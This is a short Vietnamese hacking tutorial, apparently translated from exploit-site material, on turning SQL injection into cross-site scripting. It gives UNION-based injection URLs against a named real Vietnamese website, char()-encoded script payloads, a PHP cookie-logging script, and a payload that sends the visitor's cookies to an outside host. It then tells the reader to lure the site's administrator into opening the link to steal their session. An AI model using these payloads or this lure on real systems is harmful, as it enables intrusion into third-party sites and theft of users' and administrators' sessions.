Anken - XFS - XSS From SQL - Y!m: This_Love_No1
Hôm nay lên Exploit-db, đọc mấy bài về Web Hacking thấy khá hay nên tạm dịch 1 vài viết này cho mọi người đọc.
Thứ nhất :
String :
Code:
<script>alert('Hacked By Archimonde')</script>
ASCII :
Code:
char(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 39, 72, 97, 99, 107, 101, 100, 32, 66, 121, 32, 65, 114, 99, 104, 105, 109, 111, 110, 100, 101, 39, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62)
Được bé TheSunOfVN send cho cái site bị SQLI :
Code:
http://www.masco.com.vn/?act=product&catalogueid=10 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
Nghe bé ấy bảo là số 2 nên :
Code:
http://www.masco.com.vn/?act=product&catalogueid=10 union all select 1,char(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 39, 72, 97, 99, 107, 101, 100, 32, 66, 121, 32, 65, 114, 99, 104, 105, 109, 111, 110, 100, 101, 39, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
Đây là XSS .
Thứ hai :
Create 1 file php, cookie.php chẳng hạn :
PHP Code:
<?php
$cookies = $_GET["cookie"];
if($cookies)
{
$grab = fopen("grab.txt","a");
fputs($grab, $cookies . "
");
fclose($grab);
}
?>
String :
Code:
<SCRIPT>location.href='http://www.conchim.com/cookie.php?#cookie='+escape(document.cookie)</SCRIPT>
ASCII :
Code:
char(60, 83, 67, 82, 73, 80, 84, 62, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 39, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 99, 111, 110, 99, 104, 105, 109, 46, 99, 111, 109, 47, 99, 111, 111, 107, 105, 101, 46, 112, 104, 112, 63, 35, 99, 111, 111, 107, 105, 101, 61, 39, 43, 101, 115, 99, 97, 112, 101, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 41, 60, 47, 83, 67, 82, 73, 80, 84, 62)
Sau đó report admin và send link này cho hắn :
Code:
http://www.masco.com.vn/?act=product&catalogueid=10 union all select 1,char(60, 83, 67, 82, 73, 80, 84, 62, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 39, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 99, 111, 110, 99, 104, 105, 109, 46, 99, 111, 109, 47, 99, 111, 111, 107, 105, 101, 46, 112, 104, 112, 63, 35, 99, 111, 111, 107, 105, 101, 61, 39, 43, 101, 115, 99, 97, 112, 101, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 41, 60, 47, 83, 67, 82, 73, 80, 84, 62),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
Thế là ta đã có cookie của hắn trong file grad.txt rồi .
Bạn đang đọc truyện trên: TruyenTop.Vip